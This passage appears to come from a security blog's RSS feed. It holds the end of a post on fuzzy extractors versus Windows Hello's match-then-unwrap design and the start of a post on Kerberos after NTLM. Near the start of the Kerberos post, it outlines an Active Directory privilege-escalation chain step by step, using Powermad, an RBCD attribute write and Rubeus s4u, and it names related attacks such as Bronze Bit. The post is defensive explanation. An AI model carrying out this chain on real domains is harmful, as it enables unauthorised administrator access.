&lt;p&gt;&lt;strong&gt;Reusability across user-account-rebuild scenarios.&lt;/strong&gt; PIN reset, device wipe-and-restore, and credential rotation become &lt;em&gt;key-management&lt;/em&gt; problems (rotate the TPM-sealed key) rather than &lt;em&gt;cryptographic-reusability&lt;/em&gt; problems (rotate the fuzzy extractor and trust the CFPRS bound). The former has thirty years of operational practice behind it; the latter has none.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hardware-anchored attestation is easier to reason about.&lt;/strong&gt; TPM seal-policy binding gives a hardware-anchored security argument that a relying party can verify: the trustlet measurement, the biometric-match-success signal, and the boot integrity all have to match before the key unwraps. A software-only fuzzy extractor cannot match this attestation chain. The IdP at the other end of an authentication ceremony can ask the TPM for a quote attesting that the key was used inside a specific code module on a specific device; no software construction makes that proof.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; In every shipped consumer biometric authenticator on the planet, the biometric is a gate, not an input. The cryptographic key is generated separately during provisioning -- as a TPM-bound asymmetric keypair on Windows Hello, as a Secure-Enclave-bound key on Apple Face ID, as a StrongBox-bound key on Android [@android-keystore] -- and unwrapped on match success. The key is never derived from the biometric.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;10.4 The sibling case: Apple Face ID and Touch ID&lt;/h3&gt;
&lt;p&gt;Apple&apos;s Secure Enclave Processor performs the same architectural pattern, with the Secure Enclave playing the role Windows assigns to the trustlet-plus-TPM pair. The Apple Platform Security guide is explicit:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Apple&apos;s biometric security architecture relies on a strict separation of responsibilities between the biometric sensor and the Secure Enclave, and a secure connection between the two. The sensor captures the biometric image and securely transmits it to the Secure Enclave. During enrollment, the Secure Enclave processes, encrypts, and stores the corresponding Optic ID, Face ID, and Touch ID template data. During matching, the Secure Enclave compares incoming data from the biometric sensor against the stored templates to determine whether to unlock the device or respond that a match is valid&quot; [@apple-platform-security], [@apple-secure-enclave].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two vendors, independently, converged on the same architecture. Both vendors hire the strongest cryptographers in the world. Neither built a fuzzy extractor. The architectural pattern is now the consensus answer to the consumer biometric authentication problem.&lt;/p&gt;

Apple&apos;s Secure Enclave Processor is the architectural sibling of the Windows VBS trustlet plus TPM combination. The Secure Enclave is an ARM-based coprocessor with its own kernel, its own memory, and its own boot chain, physically isolated on the Application Processor die. During Face ID or Touch ID enrolment, the biometric sensor transmits its raw image directly to the Secure Enclave over a hardware-isolated link; the Secure Enclave extracts the template, encrypts it under a per-device key sealed to the Secure Enclave&apos;s UID, and stores it. During matching, the Secure Enclave compares the live template against the stored template inside its own memory, and on success authorises the use of cryptographic keys held in the same coprocessor. The pattern is identical to the Windows Hello pattern: derive nothing from the biometric; gate a hardware-bound key on the match decision [@apple-platform-security].
&lt;p&gt;Twenty years of theoretical work; zero production consumer-OS biometric authenticators on the planet use any of it for face or fingerprint key derivation; and the engineers who said no were right, for reasons traceable to a single load-bearing inequality at the heart of the 2004 EUROCRYPT paper.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;

No. Both perform match-then-unwrap rather than derive. Windows Hello generates a TPM-bound asymmetric keypair during provisioning [@ms-learn-hello-business]; the biometric matcher, running inside a VBS trustlet, authorises the TPM to use that key on a match-success signal [@ms-learn-ess]. Apple Face ID and Touch ID follow the same pattern with a Secure-Enclave-bound key in place of a TPM-bound one [@apple-platform-security]. In neither case is the cryptographic key a function of your biometric reading.

Yes -- in SRAM PUFs. Synopsys PUF IP (including QuiddiKey), built on Intrinsic ID SRAM PUF technology, is &quot;deployed and proven in over a billion devices certified by EMVCo, Visa, CC EAL6+, PSA, ioXt, and governments across the globe&quot; [@intrinsic-id-sram-puf]. The PUF noise distribution is controlled and the entropy budget is enormous, so the DRS construction works exactly as advertised. Consumer face and fingerprint biometrics are a different regime: the noise model is adversarial, the entropy budget is small, and the construction&apos;s inequality forbids the key length an OS authenticator needs.

Because the hash is avalanche-sensitive by design: a single-bit input change flips, on average, half the output bits. Two scans of the same finger differ in many bits, so two hashes differ in roughly half their bits. The cryptographic key is statistically independent of the previous one, and the user can never log in again after their first authentication. This is the failure mode that motivates the fuzzy-extractor primitive in section 1 [@hao-anderson-daugman-2005-tr].

Because of the load-bearing inequality at the heart of the EUROCRYPT 2004 paper. For consumer face and fingerprint biometrics at the security parameter an operating system authenticator demands ($\varepsilon = 2^{-80}$ or stronger), the extractable key length is negative: the source min-entropy is too low to absorb the cost of code redundancy plus the security parameter [@dors-2008-siamjc], [@frs-2020-ieeetit]. No amount of clever engineering moves the constants.

Yes. The iris is the only common biometric that comfortably clears the DRS bar. Daugman&apos;s 2003 Pattern Recognition paper reports 249 statistical degrees of freedom across 9.1 million iris-to-iris comparisons [@daugman-2003-pdf]; Hao, Anderson, and Daugman in 2006 demonstrated a 140-bit iris key with 99.5% recovery success on 70 eyes [@hao-anderson-daugman-2006-ieeetc]. But iris sensors are expensive, intrusive, and rarely shipped in consumer phones or laptops, so the result has not generalised to mainstream consumer authentication.

Deep-learning encoders such as Engelsma-Cao-Jain&apos;s DeepPrint reduce intra-user variance by mapping noisy raw biometric readings into compact embeddings [@engelsma-cao-jain-2019-arxiv]. That reduces the noise the secure sketch has to absorb and lets the code use less redundancy. But the deep encoder does not add min-entropy to the source: the underlying fingerprint is still a 40-to-80-bit source. No published construction has been shown to clear the DRS bar on a realistic correlated-noise test set for any consumer biometric other than iris.

Unlikely without one of two changes. Either (a) the sensor stack would have to gain entropy -- for instance, adding an iris camera to a future Surface device would put the source above the DRS bar -- or (b) a CFPRS-style reusable computational fuzzy extractor would have to mature past the digital-locker idealisation [@cfprs-2016-eurocrypt]. Even then, the operational advantages of hardware-bound asymmetric keys (TPM-anchored attestation, IdP-friendly key rotation, no helper-data leakage on re-enrolment) are large enough that a fuzzy extractor would have to clear a high bar to displace the current architecture.
&lt;p&gt;The fuzzy extractor is the right primitive for the right source. SRAM PUFs are that source; consumer face and fingerprint biometrics are not. The 2004 inequality drew the line, two decades of theory have refined the line, and every shipped consumer biometric authenticator on the planet has chosen to live on the other side of it.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;fuzzy-extractors-windows-hello&quot; keyTerms={[
  { term: &quot;Fuzzy extractor&quot;, definition: &quot;A pair (Gen, Rep) producing a stable key R from a noisy source w plus a public helper P; defined by Dodis-Reyzin-Smith 2004.&quot; },
  { term: &quot;Secure sketch&quot;, definition: &quot;The noise-tolerance half of a fuzzy extractor; SS publishes a sketch s, Rec recovers w from any w&apos; within distance t given s.&quot; },
  { term: &quot;Strong randomness extractor&quot;, definition: &quot;The uniformity half of a fuzzy extractor; turns a high-min-entropy source into a uniform key, via universal hashing and the Leftover Hash Lemma.&quot; },
  { term: &quot;Leftover Hash Lemma (LHL)&quot;, definition: &quot;Impagliazzo-Levin-Luby 1989: a universal hash applied to a min-entropy source is statistically close to uniform, with budget ell &amp;lt;= m - 2 log(1/epsilon) + 2.&quot; },
  { term: &quot;Min-entropy (H_infinity)&quot;, definition: &quot;Worst-case guessing-difficulty entropy measure; the right measure for cryptographic key derivation from a peaked distribution.&quot; },
  { term: &quot;Average min-entropy&quot;, definition: &quot;Conditional min-entropy that averages an adversary&apos;s best guess over the values of a public side-channel; the right measure for secure-sketch composition.&quot; },
  { term: &quot;Helper data (P)&quot;, definition: &quot;The public part of a fuzzy extractor&apos;s output: the sketch plus the extractor seed. Available at recovery time; leaks at most epsilon bits about R.&quot; },
  { term: &quot;Trustlet (VBS)&quot;, definition: &quot;A Virtual Trust Level 1 user-mode process on Windows, isolated from the normal kernel by Hyper-V; Windows Hello runs its biometric matcher inside a trustlet.&quot; }
]} questions={[
  { q: &quot;Why does SHA-256(fingerprint_image) fail as a cryptographic key?&quot;, a: &quot;SHA-256 is avalanche-sensitive: a single-bit input change flips half the output bits. Two scans of the same finger differ in many bits, so two hashes are statistically independent. The key is unrecoverable on the second scan.&quot; },
  { q: &quot;What does the DRS 2004 inequality bound, and what are its three terms?&quot;, a: &quot;It bounds the extractable key length ell &amp;lt;= H_infinity(W) - (n-k) - 2 log(1/epsilon) + 2. The three terms are the source min-entropy, the code redundancy paid to absorb noise, and the security parameter cost paid to the Leftover Hash Lemma.&quot; },
  { q: &quot;What is the architectural difference between deriving a key from a biometric and gating a key on a biometric?&quot;, a: &quot;Deriving makes the biometric itself the secret; if the biometric leaks, the key is at risk. Gating generates a key independently and uses the biometric only to decide whether to release it; the key&apos;s secrecy is anchored in hardware (TPM, Secure Enclave) and is independent of the biometric.&quot; },
  { q: &quot;Why does Windows Hello not use a fuzzy extractor?&quot;, a: &quot;Because the DRS inequality forbids a useful key on consumer face or fingerprint at security parameters an OS demands; because helper-data leakage compounds under re-enrolment; and because hardware-anchored match-then-unwrap gives TPM-backed attestation that no software fuzzy extractor can match.&quot; },
  { q: &quot;Where are fuzzy extractors actually deployed in production?&quot;, a: &quot;In SRAM PUFs. Synopsys PUF IP (including QuiddiKey) embeds a DRS-style fuzzy extractor in over a billion devices certified by EMVCo, Visa, CC EAL6+, PSA, ioXt, and governments. The PUF noise model is controlled and the entropy budget is large enough.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>cryptography</category><category>biometrics</category><category>fuzzy-extractors</category><category>windows-hello</category><category>tpm</category><category>authentication</category><category>information-theory</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Kerberos in Windows: The Other Half of NTLMless</title><link>https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/</link><guid isPermaLink="true">https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/</guid><description>After NTLM, Kerberos becomes the load-bearing authentication protocol for Windows. Eight years of attacks, the December 2025 Beyond-RC4 cadence, and the H2 2026 IAKerb / Local KDC broad enable.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Kerberos was a 1988 protocol that solved one problem: mutual authentication on an untrusted network using a trusted third party.** Then it got piled on for thirty-three years. In 2026 NTLM is being switched off, the AS-REQ / AS-REP / TGS-REQ / TGS-REP skeleton is finally the single load-bearing authentication path for Windows, and the eleven attack primitives that exposed every joint of that skeleton between 2014 and 2022 are still mostly fixable by configuration, not by protocol. This is the companion to [NTLMless](/blog/ntlmless-the-death-of-ntlm-in-windows/): what happens to the protocol that takes over.
&lt;h2&gt;1. A Chain Without NTLM&lt;/h2&gt;
&lt;p&gt;Imagine a defender who has done every NTLM retrofit Microsoft has shipped. NTLM is disabled by default on the workstations. &lt;code&gt;RestrictNTLMInDomain&lt;/code&gt; is on at the domain controller. SMB signing is enforced. Extended Protection for Authentication is set on every IIS endpoint. ESC8 has been patched. The defender has read the &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless&lt;/a&gt; post and ticked every box.&lt;/p&gt;
&lt;p&gt;A low-privileged user on that network opens a PowerShell prompt. They run &lt;code&gt;Powermad&lt;/code&gt; to create a fresh computer account. The default &lt;code&gt;MachineAccountQuota&lt;/code&gt; is still &lt;code&gt;10&lt;/code&gt;, which means any authenticated domain user can create up to ten computer objects in Active Directory by design [@shenanigans-rbcd]. They then write a single LDAP attribute, &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt;, on a target file server they have any write permission against. They ask the Key Distribution Center for a service ticket via &lt;code&gt;Rubeus s4u&lt;/code&gt;, present that ticket to the target file server, and walk in as &lt;code&gt;Administrator&lt;/code&gt;. Total elapsed time: less than this paragraph. Total NTLM in the chain: zero.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The post-NTLM Resource-Based Constrained Delegation chain depends on three properties of Kerberos that are features, not bugs: (a) the default &lt;code&gt;MachineAccountQuota = 10&lt;/code&gt; setting on every fresh Active Directory forest, (b) the S4U2Proxy guarantee that always produces a forwardable TGS even when the input ticket was not forwardable, and (c) the absence of any KDC-side check on whether the requesting principal is a &quot;trusted delegator&quot;. All three are documented behaviours of the protocol. None of them is a CVE [@shenanigans-rbcd].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The chain has a name and a primary disclosure: Elad Shamir&apos;s &quot;Wagging the Dog&quot; post on shenaniganslabs.io, January 28, 2019 [@shenanigans-rbcd]. The weaponised tooling is GhostPack&apos;s Rubeus, the C# Kerberos toolset that ships ready-made commands for &lt;code&gt;s4u&lt;/code&gt;, &lt;code&gt;asktgt&lt;/code&gt;, &lt;code&gt;kerberoast&lt;/code&gt;, and &lt;code&gt;diamond&lt;/code&gt; [@ghostpack-rubeus]. The single-line elevation wrapper that splices together Powermad, KrbRelay, Rubeus, and an SCM bypass is &lt;code&gt;KrbRelayUp&lt;/code&gt;, published by Mor Davidovich (&quot;Dec0ne&quot;) on April 24, 2022; its README scopes itself as a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (and that is the default) [@krbrelayup].&lt;/p&gt;

sequenceDiagram
    participant U as Low-priv user
    participant DC as Domain Controller / KDC
    participant T as Target file server
    U-&amp;gt;&amp;gt;DC: Powermad: create machine account FAKE (machine account)
    U-&amp;gt;&amp;gt;DC: LDAP write set RBCD attribute on T to allow FAKE
    U-&amp;gt;&amp;gt;DC: AS-REQ for FAKE -&amp;gt; TGT
    U-&amp;gt;&amp;gt;DC: S4U2Self as Administrator (non-forwardable TGS returned)
    U-&amp;gt;&amp;gt;DC: S4U2Proxy with TGS returns forwardable TGS for cifs on T
    U-&amp;gt;&amp;gt;T: AP-REQ presenting Administrator TGS
    T-&amp;gt;&amp;gt;U: SYSTEM access on T
&lt;p&gt;Read the chain twice. The first read shows that every step is a documented Kerberos exchange. The second read shows that &lt;em&gt;removing NTLM did nothing to it&lt;/em&gt;. Restrict-NTLM, EPA, SMB signing, ESC8 -- the entire NTLM-retrofit catalogue has no edge against a Kerberos-only attack path that uses S4U2Self, S4U2Proxy, and the Resource-Based Constrained Delegation attribute exactly as Microsoft documented them in [@ms-kerberos-overview].&lt;/p&gt;
&lt;p&gt;This is the article&apos;s load-bearing thesis. &lt;em&gt;Removing NTLM did not remove the attack surface; it shifted the attack surface onto a protocol that is also thirty-three years old, also retrofitted, and now also the only load-bearing one.&lt;/em&gt; In October 2023, Matthew Palko, Microsoft&apos;s Principal Group Product Manager for Windows authentication, wrote the post that committed Microsoft publicly to deprecating NTLM and named the Kerberos features that would replace it [@ms-palko-evolution]. The NTLMless companion article walked through the NTLM-side mechanics of that transition. This one walks through the Kerberos side.&lt;/p&gt;
&lt;p&gt;The question that drives everything that follows is the question the chain above forces: &lt;em&gt;how did Windows arrive at a state where the most catastrophic post-NTLM Active Directory attack chain depends on Kerberos working exactly as the 1989 designers intended?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;2. Origins: Needham, Schroeder, Athena, and 1988&lt;/h2&gt;
&lt;p&gt;Kerberos is not new engineering. The story of Windows authentication in 2026 starts with two Xerox PARC researchers and a 1978 paper in Communications of the ACM.&lt;/p&gt;
&lt;p&gt;In December 1978, Roger M. Needham and Michael D. Schroeder published &quot;Using Encryption for Authentication in Large Networks of Computers&quot; in CACM 21(12), pages 993 to 999 [@needham-schroeder]. The paper is paywalled on the ACM Digital Library, but RFC 4120&apos;s own Background section names it as the parent protocol [@rfc4120] and the Wikipedia article on the Needham-Schroeder protocol preserves the message structure verbatim [@wiki-needham-schroeder]. The symmetric-key version of that protocol is five messages long, and it is the structural blueprint of every &quot;ticket from a trusted third party&quot; design that followed.&lt;/p&gt;
&lt;p&gt;$$A \to S:\ A, B, N_A$$
$$S \to A:\ {N_A, K_{AB}, B, {K_{AB}, A}&lt;em&gt;{K&lt;/em&gt;{BS}}}&lt;em&gt;{K&lt;/em&gt;{AS}}$$
$$A \to B:\ {K_{AB}, A}&lt;em&gt;{K&lt;/em&gt;{BS}}$$
$$B \to A:\ {N_B}&lt;em&gt;{K&lt;/em&gt;{AB}}$$
$$A \to B:\ {N_B - 1}&lt;em&gt;{K&lt;/em&gt;{AB}}$$&lt;/p&gt;
&lt;p&gt;&lt;code&gt;A&lt;/code&gt; and &lt;code&gt;B&lt;/code&gt; are the principals; &lt;code&gt;S&lt;/code&gt; is the trusted third party; &lt;code&gt;K_AS&lt;/code&gt; and &lt;code&gt;K_BS&lt;/code&gt; are pre-shared long-term keys; &lt;code&gt;K_AB&lt;/code&gt; is the session key that &lt;code&gt;S&lt;/code&gt; mints for the conversation; &lt;code&gt;N_A&lt;/code&gt; and &lt;code&gt;N_B&lt;/code&gt; are nonces. The &quot;ticket&quot; is the part of the third message that &lt;code&gt;A&lt;/code&gt; cannot decrypt and just forwards to &lt;code&gt;B&lt;/code&gt;. That structure -- a server-issued cryptographic envelope intended for somebody else and opaque to the carrier -- is what becomes the Kerberos ticket a decade later.&lt;/p&gt;
&lt;p&gt;Three years later, in August 1981, Dorothy Denning and Giovanni Maria Sacco published &quot;Timestamps in Key Distribution Protocols&quot; in CACM 24(8), 533-536. The paper is also paywalled on dl.acm.org, but the Wikipedia secondary preserves the finding: the Needham-Schroeder symmetric protocol is vulnerable to a replay attack if an attacker recovers an old session key [@wiki-needham-schroeder]. Denning and Sacco proposed timestamps as the fix. This is the structural reason every Kerberos ticket carries a timestamp and every Kerberos network requires a synchronised time service today.&lt;/p&gt;

A Kerberos administrative boundary, written in uppercase like `CONTOSO.COM`, that scopes a set of principals (users, services, computers) sharing a single Key Distribution Center. Every Kerberos ticket records realm membership: the client&apos;s realm and name appear in `EncTicketPart.crealm` and `EncTicketPart.cname`, while the outer `Ticket.realm` and `Ticket.sname` name the service&apos;s realm and principal. Active Directory binds one Kerberos domain to one AD forest root by default [@ms-kerberos-overview].
&lt;p&gt;Between 1983 and 1991, MIT Project Athena -- the joint MIT, DEC, and IBM campus computing effort led by Jerome Saltzer -- needed a working authentication service for a distributed workstation network running over a hostile campus LAN. The Athena Technical Plan Section E.2.1, &quot;Kerberos Authentication and Authorization System&quot; [@mit-athena-plan], is the canonical internal design document. Steve Miller and Clifford Neuman did the protocol work; Jeffrey Schiller ran the network operations.&lt;/p&gt;
&lt;p&gt;In February 1988, MIT published two complementary artefacts. Bill Bryant wrote &quot;Designing an Authentication System: a Dialogue in Four Scenes&quot; -- a pedagogical script in which an engineer named Athena designs her way step by step from &quot;users type their password to every server&quot; to &quot;users obtain time-limited tickets from a trusted third party&quot;. Bryant&apos;s dialogue is the most cited pre-protocol document about why Kerberos exists in the shape it does [@mit-dialogue]. The same month, Jennifer Steiner, Clifford Neuman, and Jeffrey Schiller presented &quot;Kerberos: An Authentication Service for Open Network Systems&quot; at the USENIX Winter Conference in Dallas [@cerias-steiner1988]. The protocol that paper described -- later called Kerberos version 4 -- carried forward to v5 with ASN.1 encoding, extensibility hooks, and pre-authentication, but the AS / TGS / AP message-triple skeleton it specified is unchanged thirty-eight years later.&lt;/p&gt;
&lt;p&gt;On January 24, 1989, MIT shipped the first public release of Kerberos v4 [@wiki-kerberos]. Five years later, in September 1993, the IETF adopted Kerberos v5 as RFC 1510 [@rfc1510]. RFC 1510 added ASN.1 encoding, cross-domain trust, and an extensibility hook called PA-DATA that every Kerberos extension since has used. In July 2005, RFC 4120 replaced RFC 1510 as the Kerberos v5 standard [@rfc4120].&lt;/p&gt;

sequenceDiagram
    participant C as Client
    participant AS as Authentication Service
    participant TGS as Ticket-Granting Service
    participant S as Application Server
    C-&amp;gt;&amp;gt;AS: AS-REQ: identify yourself
    AS-&amp;gt;&amp;gt;C: AS-REP TGT encrypted to TGS, session key wrapped under client long-term key
    C-&amp;gt;&amp;gt;TGS: TGS-REQ: present TGT, ask for service ticket
    TGS-&amp;gt;&amp;gt;C: TGS-REP service ticket encrypted to S, session key wrapped under TGT session key
    C-&amp;gt;&amp;gt;S: AP-REQ: present service ticket
    S-&amp;gt;&amp;gt;C: AP-REP: mutual auth confirmation
&lt;p&gt;Kerberos in 2026 is the same protocol as Kerberos in 1988, with thirty-three years of extensions piled on top. The skeleton you draw on a whiteboard for a graduate seminar is exactly the skeleton a Windows 11 24H2 machine throws at a 2025 domain controller. The interesting question is what those thirty-three years of extensions did to the inside of every message.The default maximum clock skew between client and KDC in Windows Kerberos is five minutes (300 seconds), set by Group Policy &quot;Maximum tolerance for computer clock synchronization&quot; and documented in [@ms-kerberos-overview]. The five-minute window is the residue of Denning and Sacco&apos;s 1981 timestamp fix.&lt;/p&gt;
&lt;h2&gt;3. The Wire in 2026: Six Messages and an Encryption Matrix&lt;/h2&gt;
&lt;p&gt;Every Kerberos textbook draws the same six-message diagram you saw in Section 2. The diagram has been unchanged since 1988. What is different in 2026 is everything inside the messages.&lt;/p&gt;
&lt;p&gt;Look first at the AS-REQ. In raw RFC 4120 the AS-REQ carries a &lt;code&gt;req-body&lt;/code&gt; (client name, target name, requested lifetime, requested enctypes) and an optional &lt;code&gt;padata&lt;/code&gt; field [@rfc4120]. That &lt;code&gt;padata&lt;/code&gt; slot is the load-bearing extensibility hook of the entire protocol. Every Kerberos enhancement since 1993 has been a new PA-DATA type: &lt;code&gt;PA-ENC-TIMESTAMP&lt;/code&gt; (the encrypted-timestamp pre-auth blob), &lt;code&gt;PA-PK-AS-REQ&lt;/code&gt; (PKINIT [@rfc4556]), &lt;code&gt;PA-FX-FAST-REQUEST&lt;/code&gt; (FAST armoring [@rfc6113]), &lt;code&gt;PA-AS-FRESHNESS&lt;/code&gt; (PKINIT freshness [@rfc8070]). The skeleton survives only because the joints are extensible.&lt;/p&gt;

A `SEQUENCE OF { padata-type, padata-value }` field in the Kerberos AS-REQ and AS-REP messages, introduced in RFC 1510 (1993) and carried forward unchanged into RFC 4120 §5.2.7 (2005). PA-DATA is the only protocol-level hook by which a Kerberos client can prove possession of a credential before the KDC issues a Ticket-Granting Ticket, and the only hook by which an enhancement like FAST or PKINIT can attach new behaviour to the AS exchange without breaking compatibility with older clients [@rfc4120].
&lt;p&gt;The AS-REP returns the TGT. The TGT itself is encrypted under the TGS&apos;s long-term key, so the client cannot inspect it. What the client &lt;em&gt;can&lt;/em&gt; inspect is the &lt;code&gt;EncTicketPart&lt;/code&gt; flag bitfield wrapped in the TGT envelope. RFC 4120 §2 enumerates the ticket-flag positions, including &lt;code&gt;forwardable&lt;/code&gt;, &lt;code&gt;proxiable&lt;/code&gt;, &lt;code&gt;postdated&lt;/code&gt;, &lt;code&gt;renewable&lt;/code&gt;, &lt;code&gt;initial&lt;/code&gt;, &lt;code&gt;pre-authent&lt;/code&gt;, &lt;code&gt;hw-authent&lt;/code&gt;, &lt;code&gt;transited-policy-checked&lt;/code&gt;, and &lt;code&gt;ok-as-delegate&lt;/code&gt; [@rfc4120]. (&lt;code&gt;may-postdate&lt;/code&gt; looks like a sibling but is a &lt;code&gt;KDCOptions&lt;/code&gt; request bit per RFC 4120 §5.4.1, not a &lt;code&gt;TicketFlags&lt;/code&gt; bit.) Pay attention to &lt;code&gt;forwardable&lt;/code&gt;. In 2020, Jake Karnes of NetSPI demonstrated that an attacker who knew a service account&apos;s long-term key could decrypt the S4U2Self output ticket, set &lt;code&gt;forwardable = 1&lt;/code&gt;, re-encrypt, and feed the ticket back to the KDC&apos;s S4U2Proxy step. The KDC accepted it. The bypass is CVE-2020-17049 and the attack is called Bronze Bit [@cve-2020-17049] [@netspi-bronze-bit].&lt;/p&gt;
&lt;p&gt;Inside the ticket&apos;s &lt;code&gt;AuthorizationData&lt;/code&gt; field is the Microsoft-specific construction that turns Kerberos into a Windows authorisation system. The Privilege Attribute Certificate, defined in [MS-PAC] revision 26.0 [@ms-pac-overview] [@ms-pac-deeplink], carries the user&apos;s SID, their group SIDs, their logon name, timestamps, and three cryptographic signatures: a Server signature, a KDC signature, and -- since CVE-2022-37967 in November 2022 -- a Full PAC Signature that covers the entire encoded PAC structure instead of just the existing signatures [@cve-2022-37967].&lt;/p&gt;

A Microsoft-specific authorization data element that the Kerberos KDC normally attaches to tickets it issues for a Windows principal. The PAC carries the user&apos;s SID, group SIDs, logon name, and timestamps, and is signed by the KDC&apos;s `krbtgt` key and by the target service&apos;s key. The PAC, not the Kerberos ticket itself, is what gives a Windows file server the access-control information it needs to make a permission decision. Defined in [MS-PAC] [@ms-pac-overview].

The KB article URL ends in `cve-2022-37967` and the body text begins by referring to &quot;CVE-2022-37966&quot;. This is not a typo in the citation -- it is a Microsoft filing artefact. November 2022 Patch Tuesday paired two Kerberos CVEs: CVE-2022-37967 (Full PAC Signature, KrbtgtFullPacSignature) and CVE-2022-37966 (default session-key encryption type). KB5021131 covers the deployment of the encryption-type bypass side. A sibling article, KB5020805, covers the Full PAC Signature side. When citing KB5021131 alongside the Full PAC Signature, both CVE numbers are relevant [@ms-kb-5021131] [@cve-2022-37967].
&lt;p&gt;Then there is the encryption matrix. Kerberos abstracts ciphers behind the RFC 3961 framework [@rfc3961], which defines an enctype as a tuple of (encrypt, decrypt, checksum, string-to-key, key-derivation) functions. The history of Windows Kerberos is the history of which enctypes were the default at any given time.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Enctype&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;th&gt;Spec&lt;/th&gt;
&lt;th&gt;Status in 2026&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DES-CBC-CRC&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;RFC 3961 [@rfc3961]&lt;/td&gt;
&lt;td&gt;Disabled by default since Server 2008 R2 [@ms-kile-227]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DES-CBC-MD5&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;RFC 3961 [@rfc3961]&lt;/td&gt;
&lt;td&gt;Disabled by default since Server 2008 R2 [@ms-kile-227]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RC4-HMAC&lt;/td&gt;
&lt;td&gt;23&lt;/td&gt;
&lt;td&gt;RFC 4757 [@rfc4757]&lt;/td&gt;
&lt;td&gt;Informational, not Standards Track; default-removed in mid-2026 per [@ms-beyond-rc4]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AES-128-CTS-HMAC-SHA1-96&lt;/td&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;RFC 3962 [@rfc3962]&lt;/td&gt;
&lt;td&gt;Default since Server 2008; cross-version compatible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AES-256-CTS-HMAC-SHA1-96&lt;/td&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;RFC 3962 [@rfc3962]&lt;/td&gt;
&lt;td&gt;Default since Server 2008; the mid-2026 destination&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AES-128-CTS-HMAC-SHA256-128&lt;/td&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;RFC 8009 [@rfc8009]&lt;/td&gt;
&lt;td&gt;Specified in [MS-KILE] bit K [@ms-kile-227]; no default-enable timeline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AES-256-CTS-HMAC-SHA384-192&lt;/td&gt;
&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;RFC 8009 [@rfc8009]&lt;/td&gt;
&lt;td&gt;Specified in [MS-KILE] bit L [@ms-kile-227]; no default-enable timeline&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Enctype 23 is the row that built every Kerberoasting career. Kannan Jaganathan, Larry Zhu, and John Brezak of Microsoft published RFC 4757 in December 2006 [@rfc4757]. The IESG note on the RFC is unusually candid: the document is &lt;em&gt;Informational&lt;/em&gt;, not Standards Track, because RC4-HMAC &quot;do[es] not provide all the required operations in the Kerberos cryptography framework [RFC 3961]&quot; and because of &quot;security concerns with the use of RC4 and MD4&quot;. The choice that made enctype 23 dangerous, however, was upstream of the RFC. To make Windows 2000&apos;s Kerberos rollout backward-compatible with the existing SAM password database, Microsoft set the RC4-HMAC long-term Kerberos key equal to the &lt;em&gt;NT hash of the user&apos;s password&lt;/em&gt; -- the same hash NTLM was already storing. As Microsoft&apos;s own October 2024 Kerberoasting guidance puts it verbatim: &quot;RC4 is more susceptible to the cyberattack because it uses no salt or iterated hash when converting a password to an encryption key&quot; [@ms-kerberoasting-guidance].&lt;/p&gt;

The function that converts a typed password into a Kerberos long-term symmetric key. For RC4-HMAC (enctype 23), `s2k(password) = MD4(UTF-16-LE(password))` -- the NT hash, no salt, no iteration. For AES-CTS-HMAC-SHA1-96 (enctypes 17 and 18), `s2k(password, salt) = PBKDF2-HMAC-SHA1(password, salt, 4096, dklen)` followed by RFC 3962 post-processing into a 128- or 256-bit AES key. The salt is the concatenation of the Kerberos domain name and the user principal name [@rfc3962].
&lt;p&gt;The cryptography in that definition is short enough to read end-to-end. Here it is in JavaScript using the Web Crypto API:&lt;/p&gt;
&lt;p&gt;{`
async function kerberosStringToKey256(password, salt) {
  const enc = new TextEncoder();
  const passKey = await crypto.subtle.importKey(
    &quot;raw&quot;,
    enc.encode(password),
    { name: &quot;PBKDF2&quot; },
    false,
    [&quot;deriveBits&quot;]
  );
  const rawBits = await crypto.subtle.deriveBits(
    {
      name: &quot;PBKDF2&quot;,
      salt: enc.encode(salt),
      iterations: 4096,
      hash: &quot;SHA-1&quot;,
    },
    passKey,
    256
  );
  const hex = [...new Uint8Array(rawBits)]
